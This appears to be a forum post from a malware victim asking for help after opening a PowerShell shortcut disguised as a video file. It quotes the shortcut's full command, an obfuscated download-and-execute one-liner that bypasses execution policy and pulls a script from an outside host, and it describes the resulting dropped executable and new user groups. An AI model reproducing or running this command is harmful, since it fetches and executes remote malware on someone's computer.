I downloaded what I thought was a video file and after I tried to open it twice, I realized it was actually a Powershell shortcut with the following parameters: -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB
I immediately ran virus scans on Windows Defender, Malwarebytes and Kaspersky VRT but they didn't catch anything. I checked Event Viewer and it has logged multiple events in Powershell and security within a few seconds of the shortcut being run, so I know it did something or at least tried to do something and I just want to be sure that my computer is safe.
I ran the shortcut at 2019-04-10 04:02 and from the FRST.txt I can see that it downloaded a file called rew.exe that is associated with Realtek Semiconductor and has the adobe logo as its icon so its definitely not legit, it seems the anti-virus programs didn't catch it and its still on my system, what should I do with it?
It also created several user permission groups and I have no idea how to get rid of them.
FRST.txt
Addition.txt